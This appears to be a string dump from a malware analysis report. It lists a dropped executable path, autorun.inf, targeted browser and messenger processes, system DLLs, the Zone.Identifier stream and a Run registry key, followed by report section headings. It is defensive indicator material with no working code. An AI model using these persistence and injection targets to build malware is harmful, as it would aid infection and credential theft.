%Documents and Settings%\%current user%\Application Data\Rukmkd.exe

7 767<7~7

8*808;8~8

\\.\pipe

Internet Explorer\iexplore.exe

autorun.inf

pidgin.exe

wlcomm.exe

msnmsgr.exe

msmsgs.exe

flock.exe

opera.exe

chrome.exe

ieuser.exe

iexplore.exe

firefox.exe

.ipconfig.exe

verclsid.exe

regedit.exe

rundll32.exe

cmd.exe

regsvr32.exe

l"%s" %S

lol.exe

n127.0.0.1

%s:Zone.Identifier

wininet.dll

secur32.dll

ws2_32.dll

:%S%S\Desktop.ini

winlogon.exe

explorer.exe

Aadvapi32.dll

urlmon.dll

nspr4.dll

Akernel23.dll

y%s\%s.exe

lsass.exe

Software\Microsoft\Windows\CurrentVersion\Policies\System

.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run

\Device\HarddiskVolume1\WINDOWS\system32\wuauclt.exe

c:\%original file name%.exe

Summary

Dynamic Analysis

Removals

Static Analysis

Network Activity

Map

Strings from Dumps